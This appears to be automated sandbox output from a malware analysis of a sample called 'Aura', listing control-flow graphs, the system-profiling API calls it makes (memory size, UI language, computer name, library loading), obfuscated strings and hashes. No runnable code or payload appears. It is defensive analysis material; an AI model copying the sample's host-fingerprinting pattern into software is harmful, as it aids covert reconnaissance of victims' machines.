                                                                                                                                                                                                                                                    control_flow_graph 1129 42c8bc-42c8d3 1130 42c8e0-42c926 1129->1130 1130->1130 1131 42c928-42c92f 1130->1131 1132 42c931-42c935 1131->1132 1133 42c94b-42c967 1131->1133 1134 42c940-42c949 1132->1134 1136 42c970-42c9bb 1133->1136 1134->1133 1134->1134 1136->1136 1137 42c9bd-42c9c4 1136->1137 1138 42c9c6-42c9ca 1137->1138 1139 42c9db-42c9e7 1137->1139 1140 42c9d0-42c9d9 1138->1140 1141 42ca01-42ca4b call 43eab0 GetPhysicallyInstalledSystemMemory 1139->1141 1142 42c9e9-42c9eb 1139->1142 1140->1139 1140->1140 1147 42ca50-42ca77 1141->1147 1143 42c9f0-42c9fd 1142->1143 1143->1143 1145 42c9ff 1143->1145 1145->1141 1147->1147 1148 42ca79-42cab3 call 41e3a0 1147->1148 1151 42cac0-42caf8 1148->1151 1151->1151 1152 42cafa-42cb01 1151->1152 1153 42cb03-42cb0b 1152->1153 1154 42cb59 1152->1154 1155 42cb10-42cb19 1153->1155 1156 42cb5d-42cb65 1154->1156 1155->1155 1157 42cb1b 1155->1157 1158 42cb67-42cb68 1156->1158 1159 42cb7b-42cb85 1156->1159 1157->1156 1160 42cb70-42cb79 1158->1160 1161 42cb87-42cb8b 1159->1161 1162 42cb9b-42cbea 1159->1162 1160->1159 1160->1160 1163 42cb90-42cb99 1161->1163 1164 42cbf0-42cc04 1162->1164 1163->1162 1163->1163 1164->1164 1165 42cc06-42cc0d 1164->1165 1166 42cc2b-42cc38 1165->1166 1167 42cc0f-42cc13 1165->1167 1169 42cc3a-42cc41 1166->1169 1170 42cc5b-42cce9 1166->1170 1168 42cc20-42cc29 1167->1168 1168->1166 1168->1168 1171 42cc50-42cc59 1169->1171 1171->1170 1171->1171
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CA2C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                    • String ID: Ffd^$aN
                                                                                                                                                                                                                                                    • API String ID: 3960555810-4055630379
                                                                                                                                                                                                                                                    • Opcode ID: 3a1935831da5644078c90ac699fbe6a65a8607549c65db78d83b0f1855ac7ff5
                                                                                                                                                                                                                                                    • Instruction ID: 8ba5f777abe5cb21ac73ba220a559c846b31c3f997e253584173d0a861dea93d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a1935831da5644078c90ac699fbe6a65a8607549c65db78d83b0f1855ac7ff5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BB1F47160C7918BD729CF3994A03ABFFD0AF92300F5849AEE5D5873A2D7398406CB46

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1186 40b11d-40b124 1187 40b132-40b30b 1186->1187 1188 40b12b-40b12d 1186->1188 1190 40b310-40b325 1187->1190 1189 40b50e-40b515 1188->1189 1190->1190 1191 40b327-40b347 1190->1191 1193 40b4c0-40b4da 1191->1193 1194 40b542-40b54a 1191->1194 1195 40b58c-40b59d 1191->1195 1196 40b34e-40b3e3 call 407f30 1191->1196 1197 40b516-40b52b call 43eab0 1191->1197 1198 40b418 1191->1198 1199 40b499 1191->1199 1200 40b41e-40b41f 1191->1200 1201 40b420 1191->1201 1202 40b4e0-40b4e2 1191->1202 1203 40b5a2-40b5b4 1191->1203 1204 40b6a2-40b6b4 1191->1204 1205 40b4a2 1191->1205 1206 40b564-40b56f 1191->1206 1207 40b426-40b437 1191->1207 1208 40b4e6 1191->1208 1209 40b3ea-40b3f6 1191->1209 1210 40b62b-40b632 1191->1210 1211 40b5ec-40b5ff 1191->1211 1212 40b4ed 1191->1212 1213 40b52d-40b531 1191->1213 1214 40b4ae-40b4b4 1191->1214 1215 40b4f2-40b4f7 1191->1215 1216 40b475-40b492 call 43cf20 1191->1216 1217 40b4f9-40b501 1191->1217 1218 40b639-40b643 1191->1218 1219 40b67b-40b69b 1191->1219 1220 40b6bb-40b6c2 1191->1220 1221 40b6fe-40b706 1191->1221 1222 40b43e-40b454 1191->1222 1193->1202 1226 40b550-40b562 1194->1226 1196->1193 1196->1194 1196->1195 1196->1197 1196->1198 1196->1199 1196->1200 1196->1201 1196->1202 1196->1203 1196->1204 1196->1205 1196->1206 1196->1207 1196->1208 1196->1209 1196->1210 1196->1211 1196->1212 1196->1213 1196->1214 1196->1215 1196->1216 1196->1217 1196->1218 1196->1219 1196->1220 1196->1222 1197->1213 1198->1200 1199->1205 1200->1201 1201->1207 1202->1208 1228 40b5c0-40b5d2 1203->1228 1204->1193 1204->1195 1204->1197 1204->1199 1204->1202 1204->1205 1204->1208 1204->1212 1204->1213 1204->1214 1204->1215 1204->1216 1204->1220 1205->1214 1227 40b570-40b582 1206->1227 1207->1193 1207->1194 1207->1195 1207->1197 1207->1199 1207->1202 1207->1203 1207->1204 1207->1205 1207->1206 1207->1208 1207->1210 1207->1211 1207->1212 1207->1213 1207->1214 1207->1215 1207->1216 1207->1217 1207->1218 1207->1219 1207->1220 1207->1222 1208->1212 1209->1221 1224 40b710-40b712 1209->1224 1233 40b6d0-40b6d7 1209->1233 1234 40b6f1-40b6f8 1209->1234 1235 40b6c9-40b6ce 1209->1235 1236 40b509-40b50b 1209->1236 1237 40b6ea 1209->1237 1238 40b3fd-40b410 call 43eab0 1209->1238 1239 40b6df-40b6e1 1209->1239 1210->1193 1210->1195 1210->1197 1210->1199 1210->1202 1210->1204 1210->1205 1210->1208 1210->1212 1210->1213 1210->1214 1210->1215 1210->1216 1210->1218 1210->1219 1210->1220 1229 40b600-40b612 1211->1229 1212->1215 1223 40b534-40b536 1213->1223 1214->1193 1215->1223 1216->1193 1216->1197 1216->1199 1216->1202 1216->1205 1216->1208 1216->1212 1216->1213 1216->1214 1216->1215 1217->1236 1231 40b661-40b667 1218->1231 1232 40b64a-40b65f call 43eab0 1218->1232 1219->1193 1219->1195 1219->1197 1219->1199 1219->1202 1219->1204 1219->1205 1219->1208 1219->1212 1219->1213 1219->1214 1219->1215 1219->1216 1219->1220 1220->1197 1220->1213 1220->1235 1221->1224 1250 40b45d-40b46e 1222->1250 1254 40b53d 1223->1254 1226->1206 1226->1226 1227->1227 1242 40b584 1227->1242 1228->1228 1243 40b5d4-40b5e3 1228->1243 1229->1229 1244 40b614-40b626 1229->1244 1248 40b669-40b672 1231->1248 1232->1231 1233->1239 1234->1221 1235->1233 1236->1189 1237->1234 1238->1198 1239->1237 1242->1195 1243->1211 1244->1203 1248->1219 1250->1193 1250->1197 1250->1199 1250->1202 1250->1205 1250->1208 1250->1212 1250->1213 1250->1214 1250->1215 1250->1216 1254->1248
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: #\$^\$_Y
                                                                                                                                                                                                                                                    • API String ID: 0-1775706250
                                                                                                                                                                                                                                                    • Opcode ID: 1c254cbc2ea113dba85d633fbd872cadb1710f13e14ff148a90661bb3d6fd125
                                                                                                                                                                                                                                                    • Instruction ID: 64828c1c663671413410b9e3e71a9c3a4536903c3cbe0315ba33c507ed14c13b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c254cbc2ea113dba85d633fbd872cadb1710f13e14ff148a90661bb3d6fd125
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F170B9204B02DFD3248F25D891B56FBB1FF8A314F11862DD45A9B7A0D734A862CF94

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1354 42bf5d-42c967 call 432830 call 408060 1360 42c970-42c9bb 1354->1360 1360->1360 1361 42c9bd-42c9c4 1360->1361 1362 42c9c6-42c9ca 1361->1362 1363 42c9db-42c9e7 1361->1363 1364 42c9d0-42c9d9 1362->1364 1365 42ca01-42ca1f call 43eab0 1363->1365 1366 42c9e9-42c9eb 1363->1366 1364->1363 1364->1364 1370 42ca24-42ca4b GetPhysicallyInstalledSystemMemory 1365->1370 1367 42c9f0-42c9fd 1366->1367 1367->1367 1369 42c9ff 1367->1369 1369->1365 1371 42ca50-42ca77 1370->1371 1371->1371 1372 42ca79-42cab3 call 41e3a0 1371->1372 1375 42cac0-42caf8 1372->1375 1375->1375 1376 42cafa-42cb01 1375->1376 1377 42cb03-42cb0b 1376->1377 1378 42cb59 1376->1378 1379 42cb10-42cb19 1377->1379 1380 42cb5d-42cb65 1378->1380 1379->1379 1381 42cb1b 1379->1381 1382 42cb67-42cb68 1380->1382 1383 42cb7b-42cb85 1380->1383 1381->1380 1384 42cb70-42cb79 1382->1384 1385 42cb87-42cb8b 1383->1385 1386 42cb9b-42cbea 1383->1386 1384->1383 1384->1384 1387 42cb90-42cb99 1385->1387 1388 42cbf0-42cc04 1386->1388 1387->1386 1387->1387 1388->1388 1389 42cc06-42cc0d 1388->1389 1390 42cc2b-42cc38 1389->1390 1391 42cc0f-42cc13 1389->1391 1393 42cc3a-42cc41 1390->1393 1394 42cc5b-42cce9 1390->1394 1392 42cc20-42cc29 1391->1392 1392->1390 1392->1392 1395 42cc50-42cc59 1393->1395 1395->1394 1395->1395
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CA2C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                    • String ID: aN
                                                                                                                                                                                                                                                    • API String ID: 3960555810-2891654286
                                                                                                                                                                                                                                                    • Opcode ID: 0b7ae6eb79eb8a1cab3eff408834d3105dfccddd28e3ef9cd064e3f9afed7639
                                                                                                                                                                                                                                                    • Instruction ID: 6c386adf774138a6127a1a769f9df4e7c49410dfe3875cf62af68ca591d5649b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b7ae6eb79eb8a1cab3eff408834d3105dfccddd28e3ef9cd064e3f9afed7639
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C591F5B560C3918BD319CF3994A03ABBFD1AF96300F58496EE1D587362D7398806CB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: kjih$kjih
                                                                                                                                                                                                                                                    • API String ID: 0-3924671761
                                                                                                                                                                                                                                                    • Opcode ID: d2e0f1181bacb05ca1da8367e0b89aa2228c71b326f4e83b93677016c63df9da
                                                                                                                                                                                                                                                    • Instruction ID: a487c086f2bff6f57182d60980e0fcb6fe8e22d5ef2e364a4cc1ffc52942c78a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2e0f1181bacb05ca1da8367e0b89aa2228c71b326f4e83b93677016c63df9da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78F1E27A618202CFE718CF24EC5176A73E6FF8A315F4A893CE54597291EB38E910CB45
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: $b%.$-,#"
                                                                                                                                                                                                                                                    • API String ID: 2994545307-931030428
                                                                                                                                                                                                                                                    • Opcode ID: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                                                                                                                                                                    • Instruction ID: eb0a7813bc495cb2fd809d80ca2ae1eeb419bef85b2bda93f64a55ce56aa5a2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57B18A717083644BDB14DF24E8927BBB7A1EB91314F86853EE8858B381D63DDD05C39A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(004401FA,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CFCE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: kjih
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2138429548
                                                                                                                                                                                                                                                    • Opcode ID: f523621342962c52b4740b321783b526dc97598ad58fbbfbbcbe4c7a2d8bfb81
                                                                                                                                                                                                                                                    • Instruction ID: 0fb10d53722430d4b77c1d80d6dbef02a9e55c0cd5a1f5aea47d3c4abb22a9cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f523621342962c52b4740b321783b526dc97598ad58fbbfbbcbe4c7a2d8bfb81
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 083169756087914BD3688F35A8A073FBBD2EF92300FA8496DE1D2873A1D7249C05CB99
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: D]+\
                                                                                                                                                                                                                                                    • API String ID: 2994545307-1174097187
                                                                                                                                                                                                                                                    • Opcode ID: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                                                                                                                                                                    • Instruction ID: 7572c7809211613d87147b95baac5cf25656afb3abccc1c11bb3482e60d05e20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0321F579B0C3458FD754AF55E88013F77A3ABCA310F28A52ED9C243356C6745C069A1A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                                                                                                                                                                    • Instruction ID: 46bd95ab95da14b092a617a80e557a72b18f969592b6fa2af1023528b8fd012f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 593132725083048BCB14DF18E8816ABBBF5FB96320F10693DE5858B390E7359C08CB96
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f63813f41dbe511761db8f20762812b93e7ab948a97c621a9b6d96b75e500041
                                                                                                                                                                                                                                                    • Instruction ID: 9be73a98b056c2d0c7dacf170e0cd6e8e4dd5e5827fd6e65ad473f576408e71a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f63813f41dbe511761db8f20762812b93e7ab948a97c621a9b6d96b75e500041
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E41347965C3018BC7188F64CC4567BB7F2EFC6304F189A3CE48593381DA388A06870E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1e537460dccc4a7b7ef12968f72ed291eab62e9864d205944ff9e0a6744b74f2
                                                                                                                                                                                                                                                    • Instruction ID: 40e1c0e03dd7cb4f9cd5c8cc5c1a6d528c3109dc285a0f6b12963c487ef0f2fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e537460dccc4a7b7ef12968f72ed291eab62e9864d205944ff9e0a6744b74f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE110479A092448FD7089F14E89053F77A2EB8A314F28A43EDA83C3351CB709C159A0A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f3e78fea8a38b24ded5d16d5c4de34fcb1592ffda36adc458e5286e25c154e54
                                                                                                                                                                                                                                                    • Instruction ID: 8ded2d301ed04a995954a13864b114fad71100f10da4f8fc48165d4e31c5a971
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e78fea8a38b24ded5d16d5c4de34fcb1592ffda36adc458e5286e25c154e54
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E11B83464D3419BD329CF24A8D1B6BBBE2EBD2204F14E82CE08192351C5B8D8068B1E

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1120 435ed4-435ef7 call 43eab0 1123 435ef9-435efb 1120->1123 1124 435efd-435f20 GetUserDefaultUILanguage 1120->1124 1123->1124 1125 435f23-435f26 1124->1125 1127 435f51-435f7c 1125->1127 1128 435f28-435f4f 1125->1128 1128->1125
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00435EFD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                                    • String ID: A$F$G
                                                                                                                                                                                                                                                    • API String ID: 95929093-3785783914
                                                                                                                                                                                                                                                    • Opcode ID: 63f7d250430c684fa06de44afb9861202c016e2409db28788b3215d73582899f
                                                                                                                                                                                                                                                    • Instruction ID: d25d89b923c4efa808e0dea8fd42158e08fc3be147d6bfd14b539fb1b57ef5f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63f7d250430c684fa06de44afb9861202c016e2409db28788b3215d73582899f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC11E374A046808FCB09CB78C8917ED7FF26F5E310F1841ADD98AA73D1EA394941CB29

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1396 409bec-409c3b 1397 409c40-409c7d 1396->1397 1397->1397 1398 409c7f-409caf 1397->1398 1399 409cb0-409cc2 1398->1399 1399->1399 1400 409cc4-409cd0 LoadLibraryExW call 43c6f0 1399->1400 1402 409cd5-409ced 1400->1402
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000), ref: 00409CC8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID: @4C
                                                                                                                                                                                                                                                    • API String ID: 1029625771-2729656245
                                                                                                                                                                                                                                                    • Opcode ID: be34798907d0c0e48b961aaf20c694c46cc9c752a02d3d3cd553411d0cde06da
                                                                                                                                                                                                                                                    • Instruction ID: ed32fe20f9c2acc6b9e53cce2f2001b642a3f1e2c48bd5ab92002aa4c3cc17ee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be34798907d0c0e48b961aaf20c694c46cc9c752a02d3d3cd553411d0cde06da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31DFB5E043148FDB04CFA9C98169EBBF1BF5A300F0A81AAD4407B366C7745909CBD5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000005,36D9D5F5,00000100), ref: 0042C60D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                                    • String ID: lkip
                                                                                                                                                                                                                                                    • API String ID: 3545744682-4027323060
                                                                                                                                                                                                                                                    • Opcode ID: 3e29f420b480621af52cd6da3d46ec8c36be0b2672652d5602a796a52b81be5e
                                                                                                                                                                                                                                                    • Instruction ID: b4684953246b1dc9a8e0ad9d1c1e0af237496012bbf236752109d1bc8b7d4005
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e29f420b480621af52cd6da3d46ec8c36be0b2672652d5602a796a52b81be5e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F721D27020C7E28ADB258B39D5647BBBBE09FE7305F54485EC0CACB282D7789046CB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000005,36D9D5F5,00000100), ref: 0042C60D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
